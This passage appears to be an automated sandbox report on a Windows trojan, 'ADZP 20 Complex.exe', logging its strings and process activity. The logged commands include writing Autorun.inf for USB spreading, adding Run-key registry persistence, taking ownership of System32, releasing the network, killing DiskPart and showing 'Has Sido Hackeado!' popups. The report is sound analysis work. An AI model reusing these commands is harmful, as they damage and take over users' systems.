                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo off>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo Label=???>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo off>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: 9B6A.bat.0.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: Autorun.inf.2.drBinary or memory string: [AutoRun]
                  Source: B53B.bat.37.drBinary or memory string: echo off>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo off>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo off>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\virus.sysJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dll\:Zone.Identifier:$DATAJump to behavior
                  Source: C:\Windows\System32\mspaint.exeFile created: C:\Windows\Debug\WIA
                  Source: C:\Windows\System32\mspaint.exeFile created: C:\Windows\Debug\WIA\wiatrace.log
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dll\:Zone.Identifier:$DATA
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dll\:Zone.Identifier:$DATA
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dll\:Zone.Identifier:$DATA
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_004110790_2_00411079
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00411C200_2_00411C20
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_004110330_2_00411033
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00410C800_2_00410C80
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00410CA00_2_00410CA0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040B9C70_2_0040B9C7
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040FA680_2_0040FA68
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040CF180_2_0040CF18
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040EFF00_2_0040EFF0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00410FB00_2_00410FB0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0041107930_2_00411079
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00411C2030_2_00411C20
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0041103330_2_00411033
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00410C8030_2_00410C80
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00410CA030_2_00410CA0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0040B9C730_2_0040B9C7
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0040FA6830_2_0040FA68
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0040CF1830_2_0040CF18
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_0040EFF030_2_0040EFF0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00410FB030_2_00410FB0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: String function: 0040E5F0 appears 38 times
                  Source: ADZP 20 Complex.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
                  Source: classification engineClassification label: mal58.troj.winEXE@294/17@0/0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00402664 LoadResource,SizeofResource,FreeResource,0_2_00402664
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\ErrorCritico.vbsJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\9B58.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "DiskPart")
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "DiskPart")
                  Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ADZP 20 Complex.exeReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /release
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus Detectado
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus Detectado
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepad
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exe
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepad
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exe
                  Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepad
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.batJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus DetectadoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Virus DetectadoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mspaint.exe mspaint.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\notepad.exe notepadJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calcJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /rJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
